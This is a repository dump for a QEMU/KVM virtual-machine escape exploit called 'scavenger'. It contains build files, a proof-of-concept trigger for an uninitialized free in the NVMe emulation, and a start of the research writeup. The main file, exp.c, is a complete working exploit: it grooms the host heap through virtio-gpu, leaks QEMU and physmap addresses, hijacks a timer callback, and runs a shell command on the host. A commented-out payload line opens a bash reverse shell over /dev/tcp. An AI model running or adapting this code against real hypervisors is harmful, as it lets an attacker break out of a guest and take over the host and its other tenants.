├── README.md ├── as-21-Pan-Scavenger-Misuse-Error-Handling-Leading-To-QEMU-KVM-Escape.pdf ├── exploit ├── Makefile ├── common.c ├── common.h ├── exp └── exp.c ├── poc ├── Makefile ├── common.c ├── common.h └── poc.c └── writeup.md /README.md: -------------------------------------------------------------------------------- 1 | # scavenger 2 | 3 | This is an exploit for an uninitialized free in nvme:nvme_map_prp(). For more information, see the [writeup](https://github.com/hustdebug/scavenger/blob/main/writeup.md) and the [slides](https://github.com/hustdebug/scavenger/blob/main/as-21-Pan-Scavenger-Misuse-Error-Handling-Leading-To-QEMU-KVM-Escape.pdf) for the talk at Black Hat Asia 2021. 4 | 5 | ### Environment 6 | ``` 7 | $ ./qemu-system-x86_64 --version 8 | QEMU emulator version 4.2.1 (Debian 1:4.2-3ubuntu6.7) 9 | Copyright (c) 2003-2019 Fabrice Bellard and the QEMU Project developers 10 | ``` 11 | 12 | 13 | Command used to start QEMU 14 | ``` 15 | ./qemu-system-x86_64_exp -enable-kvm -boot c -m 4G -drive format=qcow2,file=./ubuntu.img \ 16 | -nic user,hostfwd=tcp:0.0.0.0:5555-:22 \ 17 | -drive file=./nvme.img,if=none,id=D11 -device nvme,drive=D11,serial=1234,cmb_size_mb=64 \ 18 | -device virtio-gpu -display none 19 | ``` 20 | 21 | ### Run 22 | 23 | Compile the exploit 24 | ``` 25 | make 26 | ``` 27 | Then 28 | ``` 29 | ./exp 30 | ``` 31 | -------------------------------------------------------------------------------- /as-21-Pan-Scavenger-Misuse-Error-Handling-Leading-To-QEMU-KVM-Escape.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hustdebug/scavenger/5779e36e85a8f6ec59f03e53b32513e277401882/as-21-Pan-Scavenger-Misuse-Error-Handling-Leading-To-QEMU-KVM-Escape.pdf -------------------------------------------------------------------------------- /exploit/Makefile: -------------------------------------------------------------------------------- 1 | ALL = exp 2 | CXX ?= g++ 3 | CXXFLAGS = -std=c++11 
-g 4 | 5 | all: $(ALL) 6 | 7 | 8 | exp: exp.o common.o 9 | $(CXX) $(CXXFLAGS) -o $@ $^ 10 | 11 | %.o: %.cpp 12 | $(CXX) $(CXXFLAGS) -fPIC -c -o $@ $< 13 | 14 | 15 | .PHONY: clean 16 | clean: 17 | rm -rf *.o 18 | rm -rf $(ALL) 19 | 20 | 21 | -------------------------------------------------------------------------------- /exploit/common.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include "common.h" 13 | 14 | void* mem_map( const char* dev, size_t offset, size_t size ) 15 | { 16 | int fd = open( dev, O_RDWR | O_SYNC ); 17 | if ( fd == -1 ) { 18 | return 0; 19 | } 20 | 21 | void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, offset ); 22 | 23 | if ( !result ) { 24 | return 0; 25 | } 26 | 27 | close( fd ); 28 | return result; 29 | } 30 | 31 | 32 | uint32_t page_offset(uint32_t addr) 33 | { 34 | return addr & ((1 << PAGE_SHIFT) - 1); 35 | } 36 | 37 | uint64_t gva_to_gfn(void *addr) 38 | { 39 | int fd = open("/proc/self/pagemap", O_RDONLY); 40 | if (fd < 0) { 41 | perror("open"); 42 | exit(1); 43 | } 44 | uint64_t pme, gfn; 45 | size_t offset; 46 | offset = ((uintptr_t)addr >> 9) & ~7; 47 | lseek(fd, offset, SEEK_SET); 48 | read(fd, &pme, 8); 49 | if (!(pme & PFN_PRESENT)) 50 | return -1; 51 | gfn = pme & PFN_PFN; 52 | return gfn; 53 | } 54 | 55 | uint64_t gva_to_gpa(void *addr) 56 | { 57 | uint64_t gfn = gva_to_gfn(addr); 58 | assert(gfn != -1); 59 | return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr); 60 | } 61 | -------------------------------------------------------------------------------- /exploit/common.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define PAGE_SHIFT 12 4 | #define PAGE_SIZE (1 << PAGE_SHIFT) 5 | #define PFN_PRESENT (1ull << 63) 6 | #define PFN_PFN ((1ull << 55) - 1) 7 | 
#define PHY_RAM 0x80000000 8 | 9 | void* mem_map( const char* dev, size_t offset, size_t size ); 10 | uint32_t page_offset(uint32_t addr); 11 | uint64_t gva_to_gfn(void *addr); 12 | uint64_t gva_to_gpa(void *addr); 13 | -------------------------------------------------------------------------------- /exploit/exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hustdebug/scavenger/5779e36e85a8f6ec59f03e53b32513e277401882/exploit/exp -------------------------------------------------------------------------------- /exploit/exp.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | sudo /home/zjusvn/pwn/qemu-5.1.0/x86_64-softmmu/qemu-system-x86_64 \ 4 | -enable-kvm -boot c -m 4G -drive format=qcow2,file=./ubuntu.img \ 5 | -nic user,hostfwd=tcp:0.0.0.0:5555-:22 \ 6 | -drive file=./nvme.img,if=none,id=D11 -device nvme,drive=D11,serial=1234,cmb_size_mb=64 \ 7 | -device virtio-gpu -display none 8 | 9 | */ 10 | 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | #include "common.h" 17 | 18 | #define CMD_NUMS 30 19 | #define CMD_SIZE 60 20 | 21 | uint32_t nvme_mmio_addr = 0xfebf0000; 22 | uint32_t nvme_mmio_size = 0x2000; 23 | 24 | uint32_t gpu_mmio_addr = 0xfd000000; 25 | uint32_t gpu_mmio_size = 0x4000; 26 | 27 | char *nvme_mmio_base; 28 | char *gpu_mmio_base; 29 | 30 | const char exec_cmd[] = ";gnome-calculator"; 31 | // const char exec_cmd[] = ";/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/3333 0>&1'"; 32 | // #define printf // 33 | 34 | uint64_t system_offset = 0x2cf170; 35 | uint64_t nvme_process_sq_offset = 0x5A7D00; 36 | uint64_t cleanup_offset = 0x708390; 37 | 38 | 39 | typedef struct NvmeCmd { 40 | uint8_t opcode; 41 | uint8_t fuse; 42 | uint16_t cid; 43 | uint32_t nsid; 44 | uint64_t res1; 45 | uint64_t mptr; 46 | uint64_t prp1; 47 | uint64_t prp2; 48 | uint32_t cdw10; 49 | uint32_t cdw11; 50 | uint32_t cdw12; 51 | uint32_t cdw13; 52 | 
uint32_t cdw14; 53 | uint32_t cdw15; 54 | } NvmeCmd; 55 | 56 | typedef struct NvmeCqe { 57 | uint32_t result; 58 | uint32_t rsvd; 59 | uint16_t sq_head; 60 | uint16_t sq_id; 61 | uint16_t cid; 62 | uint16_t status; 63 | } NvmeCqe; 64 | 65 | NvmeCmd *cmds[CMD_NUMS]; 66 | NvmeCqe cqe; 67 | uint32_t admin_tail = 0; 68 | 69 | 70 | #define VRING_DESC_F_NEXT 1 71 | #define VRING_DESC_F_WRITE 2 72 | 73 | #define VIRTIO_PCI_COMMON_STATUS 20 74 | #define VIRTIO_PCI_COMMON_Q_SELECT 22 75 | #define VIRTIO_PCI_COMMON_Q_SIZE 24 76 | #define VIRTIO_PCI_COMMON_Q_ENABLE 28 77 | #define VIRTIO_PCI_COMMON_Q_DESCLO 32 78 | #define VIRTIO_PCI_COMMON_Q_DESCHI 36 79 | #define VIRTIO_PCI_COMMON_Q_AVAILLO 40 80 | #define VIRTIO_PCI_COMMON_Q_AVAILHI 44 81 | 82 | #define VIRTIO_GPU_CMD_RESOURCE_CREATE_2D 0x101 83 | #define VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING 0x106 84 | 85 | typedef struct VRingDesc 86 | { 87 | uint64_t addr; 88 | uint32_t len; 89 | uint16_t flags; 90 | uint16_t next; 91 | }VRingDesc; 92 | 93 | typedef struct VRingAvail 94 | { 95 | uint16_t flags; 96 | uint16_t idx; 97 | uint16_t ring[]; 98 | }VRingAvail; 99 | 100 | struct virtio_gpu_ctrl_hdr { 101 | uint32_t type; 102 | uint32_t flags; 103 | uint64_t fence_id; 104 | uint32_t ctx_id; 105 | uint32_t padding; 106 | }; 107 | 108 | typedef struct Virtio_gpu_resource_attach_backing { 109 | struct virtio_gpu_ctrl_hdr hdr; 110 | uint32_t resource_id; 111 | uint32_t nr_entries; 112 | }Virtio_gpu_resource_attach_backing; 113 | 114 | 115 | typedef struct Virtio_gpu_resource_create_2d { 116 | struct virtio_gpu_ctrl_hdr hdr; 117 | uint32_t resource_id; 118 | uint32_t format; 119 | uint32_t width; 120 | uint32_t height; 121 | }Virtio_gpu_resource_create_2d; 122 | 123 | typedef struct Virtio_gpu_mem_entry { 124 | uint64_t addr; 125 | uint32_t length; 126 | uint32_t padding; 127 | }Virtio_gpu_mem_entry; 128 | 129 | VRingDesc *desc; 130 | VRingAvail *avail; 131 | Virtio_gpu_mem_entry *ent; 132 | char *gpu_cmd; 133 | 134 | void 
gpu_wr32(uint32_t addr, uint32_t value) { 135 | *((uint32_t*)(gpu_mmio_base + addr)) = value; 136 | } 137 | 138 | void init_gpu(void) { 139 | desc = (VRingDesc *)aligned_alloc(0x1000, 100 * sizeof(VRingDesc)); 140 | avail = (VRingAvail *)aligned_alloc(0x1000, 100 * sizeof(VRingAvail)); 141 | printf("[+] DESC VIR ADDR = 0x%lx, PHY ADDR = 0x%lx\n", (uint64_t)desc, gva_to_gpa(desc)); 142 | printf("[+] Avail VIR ADDR = 0x%lx, PHY ADDR = 0x%lx\n", (uint64_t)avail, gva_to_gpa(avail)); 143 | 144 | gpu_wr32(VIRTIO_PCI_COMMON_STATUS, 0); // reset virtio 145 | gpu_wr32(VIRTIO_PCI_COMMON_Q_SELECT, 0); // sel number 146 | gpu_wr32(VIRTIO_PCI_COMMON_Q_SIZE, 640); // vq->vring.num 147 | gpu_wr32(VIRTIO_PCI_COMMON_Q_DESCLO, gva_to_gpa(desc)); // desc phy addr 148 | gpu_wr32(VIRTIO_PCI_COMMON_Q_DESCHI, gva_to_gpa(desc) >> 32); 149 | gpu_wr32(VIRTIO_PCI_COMMON_Q_AVAILLO, gva_to_gpa(avail)); // avail phy addr 150 | gpu_wr32(VIRTIO_PCI_COMMON_Q_AVAILHI, gva_to_gpa(avail) >> 32); 151 | gpu_wr32(VIRTIO_PCI_COMMON_Q_ENABLE, 1); // enable 152 | 153 | } 154 | 155 | void heap_layout1(void) { 156 | 157 | Virtio_gpu_resource_create_2d *c2d = (Virtio_gpu_resource_create_2d*)malloc(sizeof(Virtio_gpu_resource_create_2d)); 158 | c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D; 159 | c2d->resource_id = 2; 160 | c2d->format = 1; 161 | c2d->width = 0x100; 162 | c2d->height = 0x100; 163 | 164 | Virtio_gpu_resource_attach_backing *ab = (Virtio_gpu_resource_attach_backing*)malloc(sizeof(Virtio_gpu_resource_attach_backing)); 165 | ab->hdr.type = VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING; 166 | ab->resource_id = 2; 167 | ab->nr_entries = 20; // alloc 0x150 chunk 168 | 169 | ent = (Virtio_gpu_mem_entry*)malloc(0x280); // 0x280, 0x30 for timer 170 | memset(ent, 'A', sizeof(Virtio_gpu_mem_entry) * 3); 171 | ent->addr = gva_to_gpa(ent); 172 | ent->length = sizeof(Virtio_gpu_mem_entry); 173 | 174 | Virtio_gpu_mem_entry *bounce_ent = (Virtio_gpu_mem_entry*)malloc(sizeof(Virtio_gpu_mem_entry)); 175 | 
bounce_ent->addr = 0x77ffff0000; // Let dma_memory_map fail, in order to set qsg->dev as zero. 176 | bounce_ent->length = 0x280; // Then bypass the object_unref in qemu_sglist_destroy. And free the mapping table. 177 | 178 | Virtio_gpu_mem_entry *next_bounce_ent = (Virtio_gpu_mem_entry*)malloc(sizeof(Virtio_gpu_mem_entry)); 179 | next_bounce_ent->addr = 0x77ffff0000; 180 | next_bounce_ent->length = 0; 181 | 182 | desc[0].addr = gva_to_gpa(c2d); 183 | desc[0].len = sizeof(Virtio_gpu_resource_create_2d); 184 | desc[0].flags = 0; 185 | desc[0].next = 1; 186 | 187 | desc[20].addr = gva_to_gpa(ab); 188 | desc[20].len = sizeof(Virtio_gpu_resource_attach_backing); 189 | desc[20].flags = VRING_DESC_F_NEXT; 190 | desc[20].next = 21; 191 | 192 | for(int i=21; i<59; i++) { // for padding 193 | desc[i].addr = gva_to_gpa(ent); 194 | desc[i].len = sizeof(Virtio_gpu_mem_entry); 195 | desc[i].flags = VRING_DESC_F_NEXT; 196 | desc[i].next = i+1; 197 | } 198 | 199 | // desc[25].addr = gva_to_gpa(bounce_ent); // alloc bounce buffer 200 | desc[24].addr = gva_to_gpa(bounce_ent); 201 | desc[26].addr = gva_to_gpa(next_bounce_ent); 202 | 203 | desc[59].addr = gva_to_gpa(ent); // alloc bounce buffer 204 | desc[59].len = sizeof(Virtio_gpu_mem_entry); 205 | desc[59].flags = 0; 206 | desc[59].next = 2; 207 | 208 | avail[0].idx = 2; 209 | avail->ring[0] = 0; 210 | avail->ring[1] = 20; 211 | 212 | gpu_wr32(0x3000, 1); // notify 213 | 214 | } 215 | 216 | void heap_layout2(void) { 217 | 218 | Virtio_gpu_resource_create_2d *c2d = (Virtio_gpu_resource_create_2d*)malloc(sizeof(Virtio_gpu_resource_create_2d)); 219 | c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D; 220 | c2d->resource_id = 3; 221 | c2d->format = 1; 222 | c2d->width = 0x100; 223 | c2d->height = 0x100; 224 | 225 | gpu_cmd = malloc(0x200); 226 | memcpy(gpu_cmd+0x20, exec_cmd, strlen(exec_cmd)); 227 | 228 | for(int i=0; i<21; i++) { // for padding 229 | desc[i].addr = gva_to_gpa(gpu_cmd); 230 | desc[i].len = 
sizeof(Virtio_gpu_mem_entry); 231 | desc[i].flags = VRING_DESC_F_NEXT; 232 | desc[i].next = i+1; 233 | } 234 | 235 | desc[21].addr = gva_to_gpa(gpu_cmd); 236 | desc[21].len = sizeof(Virtio_gpu_mem_entry); 237 | desc[21].flags = 0; 238 | desc[21].next = 2; 239 | 240 | avail[0].idx = 3; 241 | avail->ring[2] = 0; 242 | 243 | gpu_wr32(0x3000, 1); // notify 244 | 245 | } 246 | 247 | void heap_layout3(void) { 248 | 249 | Virtio_gpu_resource_create_2d *c2d = (Virtio_gpu_resource_create_2d*)malloc(sizeof(Virtio_gpu_resource_create_2d)); 250 | c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D; 251 | c2d->resource_id = 4; 252 | c2d->format = 1; 253 | c2d->width = 0x100; 254 | c2d->height = 0x100; 255 | 256 | Virtio_gpu_resource_attach_backing *ab = (Virtio_gpu_resource_attach_backing*)malloc(sizeof(Virtio_gpu_resource_attach_backing)); 257 | ab->hdr.type = VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING; 258 | ab->resource_id = 4; 259 | ab->nr_entries = 20; 260 | 261 | ent = (Virtio_gpu_mem_entry*)malloc(0x30); // 0x280, 0x30 for timer 262 | memset(ent, 'A', sizeof(Virtio_gpu_mem_entry) * 3); 263 | ent->addr = gva_to_gpa(ent); 264 | ent->length = sizeof(Virtio_gpu_mem_entry); 265 | 266 | Virtio_gpu_mem_entry *bounce_ent = (Virtio_gpu_mem_entry*)malloc(sizeof(Virtio_gpu_mem_entry)); 267 | bounce_ent->addr = 0x77ffff0000; 268 | bounce_ent->length = 0x280; 269 | 270 | Virtio_gpu_mem_entry *next_bounce_ent = (Virtio_gpu_mem_entry*)malloc(sizeof(Virtio_gpu_mem_entry)); 271 | next_bounce_ent->addr = 0x77ffff0000; 272 | next_bounce_ent->length = 0; 273 | 274 | desc[0].addr = gva_to_gpa(c2d); 275 | desc[0].len = sizeof(Virtio_gpu_resource_create_2d); 276 | desc[0].flags = 0; 277 | desc[0].next = 1; 278 | 279 | desc[20].addr = gva_to_gpa(ab); 280 | desc[20].len = sizeof(Virtio_gpu_resource_attach_backing); 281 | desc[20].flags = VRING_DESC_F_NEXT; 282 | desc[20].next = 21; 283 | 284 | for(int i=21; i<59; i++) { // for padding 285 | desc[i].addr = gva_to_gpa(ent); 286 | desc[i].len = 
sizeof(Virtio_gpu_mem_entry); 287 | desc[i].flags = VRING_DESC_F_NEXT; 288 | desc[i].next = i+1; 289 | } 290 | 291 | desc[24].addr = gva_to_gpa(bounce_ent); 292 | desc[26].addr = gva_to_gpa(next_bounce_ent); 293 | 294 | desc[59].addr = gva_to_gpa(ent); // alloc bounce buffer 295 | desc[59].len = sizeof(Virtio_gpu_mem_entry); 296 | desc[59].flags = 0; 297 | desc[59].next = 2; 298 | 299 | avail[0].idx = 5; 300 | avail->ring[3] = 0; 301 | avail->ring[4] = 20; 302 | 303 | gpu_wr32(0x3000, 1); // notify 304 | 305 | } 306 | 307 | void nvme_wr32(uint32_t addr, uint32_t value) 308 | { 309 | *((uint32_t*)(nvme_mmio_base + addr)) = value; 310 | sleep(0.1); 311 | } 312 | 313 | uint32_t nvme_rd32(uint32_t addr) 314 | { 315 | return *((uint32_t*)(nvme_mmio_base + addr)); 316 | } 317 | 318 | void init_nvme(void) { 319 | nvme_wr32(0x14, 0); // nvme_clear_ctrl 320 | nvme_wr32(0x24, 0xff00ff); // n->bar.aqa 321 | nvme_wr32(0x28, gva_to_gpa(cmds[0])); 322 | nvme_wr32(0x2c, gva_to_gpa(cmds[0]) >> 32); 323 | 324 | uint32_t data = 1; 325 | data |= 6 << 16; // sqes 326 | data |= 4 << 20; // cqes 327 | nvme_wr32(0x14, data); // nvme_start_ctrl 328 | } 329 | 330 | uint32_t inc_tail(void) { 331 | int cur = admin_tail; 332 | admin_tail = (admin_tail + 1) % CMD_SIZE; 333 | return cur; 334 | } 335 | 336 | NvmeCmd create_cq(uint32_t prp1, uint32_t cqid, uint32_t qsize) { 337 | NvmeCmd cmd; 338 | cmd.opcode = 5; 339 | cmd.prp1 = prp1; 340 | cmd.cdw10 = cqid; 341 | cmd.cdw10 |= qsize << 16; 342 | cmd.cdw11 = 1; // cq_flags 343 | cmd.cdw11 |= 0 << 16; // irq_vector 344 | return cmd; 345 | } 346 | 347 | void create_cqlist(void) { 348 | NvmeCmd *cmd = cmds[0]; 349 | int i; 350 | for(i=0; i<25; i++) { 351 | cmd[inc_tail()] = create_cq(gva_to_gpa(&cqe), i + 1, 64); 352 | } 353 | nvme_wr32(0x1000, admin_tail); 354 | } 355 | 356 | NvmeCmd create_sq(uint64_t prp1, uint32_t sqid, uint32_t qsize, uint32_t cqid) { 357 | NvmeCmd cmd; 358 | cmd.opcode = 1; 359 | cmd.prp1 = prp1; 360 | cmd.cdw10 = sqid; 361 | 
cmd.cdw10 |= qsize << 16; 362 | cmd.cdw11 = 1; // sq_flags 363 | cmd.cdw11 |= cqid << 16; 364 | return cmd; 365 | } 366 | 367 | NvmeCmd del_sq(uint32_t qid) { 368 | NvmeCmd cmd; 369 | cmd.opcode = 0; 370 | cmd.cdw10 = qid; 371 | return cmd; 372 | } 373 | 374 | void vuln(uint64_t sqid) { 375 | NvmeCmd *cmd = cmds[sqid]; 376 | 377 | cmd[0].nsid = 1; 378 | cmd[0].opcode = 2; // NVME_CMD_READ 379 | cmd[0].prp1 = 0xf8000000 + 0x500; 380 | cmd[0].prp2 = 0; 381 | cmd[0].cdw10 = 5; // slba 382 | cmd[0].cdw11 = 0; 383 | cmd[0].cdw12 = 8; // nlb 384 | 385 | nvme_wr32(0x1000 + sqid*8, 1); 386 | } 387 | 388 | int main(int argc, char *argv[]){ 389 | 390 | 391 | nvme_mmio_base = mem_map( "/dev/mem", nvme_mmio_addr, nvme_mmio_size ); 392 | if ( !nvme_mmio_base ) { 393 | return 0; 394 | } 395 | 396 | gpu_mmio_base = mem_map( "/dev/mem", gpu_mmio_addr, gpu_mmio_size ); 397 | if ( !gpu_mmio_base ) { 398 | return 0; 399 | } 400 | 401 | for(int i=0; i USERSPACE 0x290 CHUNK\n"); 425 | // getchar(); 426 | 427 | /* free chunk 0x150->0x290 , use sqid = 1 */ 428 | cmd[inc_tail()] = create_sq(gva_to_gpa(cmds[1]), 1, 1, 1); 429 | nvme_wr32(0x1000, admin_tail); 430 | vuln(1); 431 | //printf("[D] NVME FREE 0x290 CHUNK OK!\n"); 432 | // getchar(); 433 | 434 | /* malloc map table */ 435 | heap_layout2(); 436 | //printf("[D] VIRTIO GPU PLACE MAP TABLE TO LEAK PHYSMAP ADDR!\n"); 437 | // getchar(); 438 | sleep(1); 439 | 440 | uint64_t *leak = (uint64_t *)ent; 441 | uint64_t physmap_addr = leak[36]; 442 | *(uint64_t *)(gpu_cmd) = physmap_addr+0x20; 443 | printf("[D] physmap_addr addr = 0x%lx\n", physmap_addr); 444 | // getchar(); 445 | 446 | /* del chunk 0x150 to fill up 0x150 freelist 447 | heap spray 0x290 chunk to clear 0x290 freelist */ 448 | cmd[inc_tail()] = del_sq(1); 449 | for(int i=20; i<25; i++) 450 | cmd[inc_tail()] = create_sq(gva_to_gpa(cmds[i]), i, 3, i); 451 | nvme_wr32(0x1000, admin_tail); 452 | //printf("[D] NVME CLEAR FREELIST OK!\n"); 453 | // getchar(); 454 | 455 | /* construct 
second unintialized chunk */ 456 | heap_layout3(); 457 | //printf("[D] VIRTIO GPU HEAP LAYOUT OK! 0x150 TABLE -> USERSPACE 0x40 CHUNK\n"); 458 | // getchar(); 459 | 460 | /* free chunk 0x150->0x40 , use sqid = 2 */ 461 | cmd[inc_tail()] = create_sq(gva_to_gpa(cmds[2]), 2, 1, 2); 462 | nvme_wr32(0x1000, admin_tail); 463 | vuln(2); 464 | //printf("[D] NVME FREE 0x40 CHUNK OK!\n"); 465 | // getchar(); 466 | 467 | /* new timer , use sqid = 3 */ 468 | cmd[inc_tail()] = create_sq(gva_to_gpa(cmds[3]), 3, 1, 3); 469 | nvme_wr32(0x1000, admin_tail); 470 | //printf("[D] NVME NEW TIMER OK!\n"); 471 | // getchar(); 472 | 473 | 474 | /* leak qemu_base & heap_base */ 475 | leak = (uint64_t *)ent; 476 | uint64_t qemu_base = leak[2] - nvme_process_sq_offset; 477 | uint64_t system = qemu_base + system_offset; 478 | // getchar(); 479 | printf(" _ _ _ _ _ _\n\ 480 | | (_) __ _| |__ | |_ _ _ ___ __ _ _ __ | | __ _| |__\n\ 481 | | | |/ _` | '_ \\| __| | | | |/ _ \\/ _` | '__| | |/ _` | '_ \\\n\ 482 | | | | (_| | | | | |_ | |_| | __/ (_| | | | | (_| | |_) |\n\ 483 | |_|_|\\__, |_| |_|\\__| \\__, |\\___|\\__,_|_| |_|\\__,_|_.__/\n\ 484 | |___/ |___/\n\n"); 485 | 486 | printf("[D] Qemu base = 0x%lx\n", qemu_base); 487 | printf("[D] System addr = 0x%lx\n", system); 488 | 489 | // getchar(); 490 | 491 | /* control RIP */ 492 | leak[3] = physmap_addr; 493 | leak[2] = qemu_base + cleanup_offset; 494 | 495 | 496 | printf("[D] Control RIP Sucessful! 
\n"); 497 | 498 | // fflush(stdout); 499 | sleep(1); 500 | /* trigger system command */ 501 | nvme_wr32(0x1000 + 8*3, 1); 502 | 503 | } 504 | 505 | -------------------------------------------------------------------------------- /poc/Makefile: -------------------------------------------------------------------------------- 1 | ALL = poc 2 | CXX ?= g++ 3 | CXXFLAGS = -std=c++11 -g 4 | 5 | all: $(ALL) 6 | 7 | 8 | poc: poc.o common.o 9 | $(CXX) $(CXXFLAGS) -o $@ $^ 10 | 11 | %.o: %.cpp 12 | $(CXX) $(CXXFLAGS) -fPIC -c -o $@ $< 13 | 14 | 15 | .PHONY: clean 16 | clean: 17 | rm -rf *.o 18 | rm -rf $(ALL) 19 | 20 | 21 | -------------------------------------------------------------------------------- /poc/common.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include "common.h" 13 | 14 | void* mem_map( const char* dev, size_t offset, size_t size ) 15 | { 16 | int fd = open( dev, O_RDWR | O_SYNC ); 17 | if ( fd == -1 ) { 18 | return 0; 19 | } 20 | 21 | void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, offset ); 22 | 23 | if ( !result ) { 24 | return 0; 25 | } 26 | 27 | close( fd ); 28 | return result; 29 | } 30 | 31 | 32 | uint32_t page_offset(uint32_t addr) 33 | { 34 | return addr & ((1 << PAGE_SHIFT) - 1); 35 | } 36 | 37 | uint64_t gva_to_gfn(void *addr) 38 | { 39 | int fd = open("/proc/self/pagemap", O_RDONLY); 40 | if (fd < 0) { 41 | perror("open"); 42 | exit(1); 43 | } 44 | uint64_t pme, gfn; 45 | size_t offset; 46 | offset = ((uintptr_t)addr >> 9) & ~7; 47 | lseek(fd, offset, SEEK_SET); 48 | read(fd, &pme, 8); 49 | if (!(pme & PFN_PRESENT)) 50 | return -1; 51 | gfn = pme & PFN_PFN; 52 | return gfn; 53 | } 54 | 55 | uint64_t gva_to_gpa(void *addr) 56 | { 57 | uint64_t gfn = gva_to_gfn(addr); 58 | assert(gfn != -1); 59 | return (gfn << PAGE_SHIFT) | 
page_offset((uint64_t)addr); 60 | } 61 | -------------------------------------------------------------------------------- /poc/common.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define PAGE_SHIFT 12 4 | #define PAGE_SIZE (1 << PAGE_SHIFT) 5 | #define PFN_PRESENT (1ull << 63) 6 | #define PFN_PFN ((1ull << 55) - 1) 7 | #define PHY_RAM 0x80000000 8 | 9 | void* mem_map( const char* dev, size_t offset, size_t size ); 10 | uint32_t page_offset(uint32_t addr); 11 | uint64_t gva_to_gfn(void *addr); 12 | uint64_t gva_to_gpa(void *addr); 13 | -------------------------------------------------------------------------------- /poc/poc.c: -------------------------------------------------------------------------------- 1 | /* 2 | Boot command : 3 | -drive file=./nvme.img,if=none,id=D22 -device nvme,drive=D22,serial=1234,cmb_size_mb=64 4 | */ 5 | 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include "common.h" 13 | 14 | 15 | uint32_t mmio_addr = 0xfebd0000; 16 | uint32_t mmio_size = 0x2000; 17 | 18 | char *mmio_base; 19 | 20 | typedef struct NvmeCmd { 21 | uint8_t opcode; 22 | uint8_t fuse; 23 | uint16_t cid; 24 | uint32_t nsid; 25 | uint64_t res1; 26 | uint64_t mptr; 27 | uint64_t prp1; 28 | uint64_t prp2; 29 | uint32_t cdw10; 30 | uint32_t cdw11; 31 | uint32_t cdw12; 32 | uint32_t cdw13; 33 | uint32_t cdw14; 34 | uint32_t cdw15; 35 | } NvmeCmd; 36 | 37 | NvmeCmd *cmds; 38 | 39 | void nvme_wr32(uint32_t addr, uint32_t value) 40 | { 41 | *((uint32_t*)(mmio_base + addr)) = value; 42 | } 43 | 44 | uint32_t nvme_rd32(uint32_t addr) 45 | { 46 | return *((uint32_t*)(mmio_base + addr)); 47 | } 48 | 49 | void exploit() { 50 | nvme_wr32(0x14, 0); // nvme_clear_ctrl 51 | 52 | nvme_wr32(0x28, gva_to_gpa(cmds)); 53 | nvme_wr32(0x2c, gva_to_gpa(cmds) >> 32); 54 | 55 | uint32_t data = 1; 56 | data |= 6 << 16; // sqes 57 | data |= 4 << 20; // cqes 58 | nvme_wr32(0x14, data); // nvme_start_ctrl 59 | 60 | NvmeCmd 
*cmd = &cmds[0]; 61 | cmd->opcode = 6; // NVME_ADM_CMD_IDENTIFY 62 | cmd->cdw10 = 1; // NVME_ID_CNS_CTRL 63 | cmd->prp1 = 0xf8000000 + 0x500; 64 | cmd->prp2 = 0xf8000000 + 0x4000000; // 0 65 | 66 | 67 | nvme_wr32(0x1000, 1); 68 | } 69 | 70 | int main(int argc, char *argv[]){ 71 | mmio_base = mem_map( "/dev/mem", mmio_addr, mmio_size ); 72 | if ( !mmio_base ) { 73 | return 0; 74 | } 75 | 76 | cmds = (NvmeCmd *)aligned_alloc(0x1000, 20 * sizeof(NvmeCmd)); 77 | memset(cmds, 0xb, sizeof(cmds)); 78 | printf("mmio_base = 0x%lx\n", (long)mmio_base); 79 | printf("cmd phy addr = 0x%lx\n", (long)gva_to_gpa(cmds)); 80 | exploit(); 81 | } 82 | 83 | -------------------------------------------------------------------------------- /writeup.md: -------------------------------------------------------------------------------- 1 | ### 0x01 Vulnerable Code 2 | 3 | ```c 4 | // hw/block/nvme.c 5 | static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1, 6 | uint64_t prp2, uint32_t len, NvmeCtrl *n) 7 | { 8 | hwaddr trans_len = n->page_size - (prp1 % n->page_size); 9 | trans_len = MIN(len, trans_len); 10 | int num_prps = (len >> n->page_bits) + 1; 11 | 12 | if (unlikely(!prp1)) { 13 | trace_pci_nvme_err_invalid_prp(); 14 | return NVME_INVALID_FIELD | NVME_DNR; 15 | } else if (n->bar.cmbsz && prp1 >= n->ctrl_mem.addr && 16 | prp1 < n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size)) { 17 | qsg->nsg = 0; 18 | qemu_iovec_init(iov, num_prps); 19 | qemu_iovec_add(iov, (void *)&n->cmbuf[prp1 - n->ctrl_mem.addr], trans_len); 20 | } else { 21 | pci_dma_sglist_init(qsg, &n->parent_obj, num_prps); 22 | qemu_sglist_add(qsg, prp1, trans_len); 23 | } 24 | ··· 25 | unmap: 26 | qemu_sglist_destroy(qsg); 27 | return NVME_INVALID_FIELD | NVME_DNR; 28 | } 29 | ``` 30 | 31 | The function **nvme_map_prp()** here means mapping a block of memory. And there are two ways for user to map memory, through **qemu_iovec_init()** or **pci_dma_sglist_init()**. 
